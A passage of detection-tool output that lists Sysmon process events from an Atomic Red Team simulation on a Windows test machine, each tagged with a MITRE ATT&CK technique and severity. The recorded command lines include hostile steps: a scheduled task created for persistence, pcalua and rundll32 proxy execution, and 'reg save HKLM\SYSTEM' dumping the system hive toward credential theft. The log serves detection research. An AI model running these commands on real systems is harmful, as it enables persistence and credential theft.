<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">pcalua.exe -a Java</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6E-5D31-0000-0010D8F63E00</Data>
<Data Name=""ParentProcessId"">3316</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:50.398446Z"">
</TimeCreated>
<EventRecordID>4094</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:50.198</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6E-5D31-0000-0010D8F63E00</Data>
<Data Name=""ProcessId"">3316</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:47.238555Z"">
</TimeCreated>
<EventRecordID>4093</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:47.232</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6B-5D31-0000-00102DD33E00</Data>
<Data Name=""ProcessId"">5348</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">pcalua.exe -a -c</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6B-5D31-0000-0010CCD03E00</Data>
<Data Name=""ParentProcessId"">5332</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:47.218345Z"">
</TimeCreated>
<EventRecordID>4092</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:47.195</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6B-5D31-0000-0010CCD03E00</Data>
<Data Name=""ProcessId"">5332</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.927290Z"">
</TimeCreated>
<EventRecordID>4091</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.915</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-00104BC83E00</Data>
<Data Name=""ProcessId"">888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.849870Z"">
</TimeCreated>
<EventRecordID>4090</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.845</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C5C43E00</Data>
<Data Name=""ProcessId"">3352</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6A-5D31-0000-001074C23E00</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.828722Z"">
</TimeCreated>
<EventRecordID>4089</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.814</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001074C23E00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
</TimeCreated>
<EventRecordID>4135</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
<Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
<Data Name=""ProcessId"">3952</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
<Data Name=""LogonId"">0x509ff</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
<Data Name=""ParentProcessId"">804</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
</TimeCreated>
<EventRecordID>4135</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
<Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
<Data Name=""ProcessId"">3952</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
<Data Name=""LogonId"">0x509ff</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
<Data Name=""ParentProcessId"">804</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
</TimeCreated>
<EventRecordID>4135</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
<Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
<Data Name=""ProcessId"">3952</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
<Data Name=""LogonId"">0x509ff</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
<Data Name=""ParentProcessId"">804</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.233257Z"">
</TimeCreated>
<EventRecordID>4133</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.220</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-001041504B00</Data>
<Data Name=""ProcessId"">6508</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
